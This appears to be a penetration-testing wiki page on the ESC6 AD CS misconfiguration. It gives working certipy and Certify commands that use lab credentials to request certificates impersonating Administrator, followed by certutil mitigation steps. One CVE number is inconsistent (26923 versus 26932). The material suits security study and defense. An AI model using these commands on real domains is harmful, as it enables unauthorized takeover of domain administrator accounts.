ESC6
Description
ESC6 occurs when a Certificate Authority (CA) has the EDITF_ATTRIBUTESUBJECTALTNAME2
flag enabled in its configuration. This flag allows certificate requesters to specify arbitrary Subject Alternative Name (SAN) values. If Microsoft’s May 2022 security update for CVE-2022-26923 has not been applied, the CA may be vulnerable to privilege escalation.
Under these conditions, any certificate template that supports Client Authentication and is enrollable by low-privileged users becomes a potential attack vector. This makes ESC6 similar in effect to ESC1, as an attacker can request a certificate with a forged SAN, impersonating a privileged user. Even the default "User" template could be exploited in this manner, allowing a standard domain user to escalate to a domain administrator.
Requirements for attack path
Access to an account that has at least ONE of the following permissions over a template:
The CA has the
EDITF_ATTRIBUTESUBJECTALTNAME2
flag set.Security patch for CVE-2022-26932 has not been applied to the CA
Access to an account which is permitted to enroll in a template which also supports Client Authentication. (The default user template is sufficient in most cases).
Linux
Enumeration
certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -vulnerable -stdout

Performing the attack
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -ca lab-LAB-DC-CA -template User -upn Administrator@lab.local

Once retrieved we can follow the remainder of the steps as per ESC1.
ESC1Windows
Enumeration
Certify can be used to check the Certificate Authorities for the EDITF_ATTRIBUTESUBJECTALTNAME2
flag.
.\Certify.exe cas

Performing the attack
The steps to perform the attack are almost identical to ESC1 except we pick the default "User" template or any other candidate template if required.
.\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:User /altname:Administrator

After retrieval, we can follow the remainder of the steps within ESC1 to complete the attack.
ESC1Mitigations
Remove the flag
EDITF_ATTRIBUTESUBJECTALTNAME2
from the Certificate Authority.
Run the following on the Certificate Authority as Domain Administrator.
certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
After doing so, restart the service to allow changes to take place.
net stop certsvc & net start certsvc
Last updated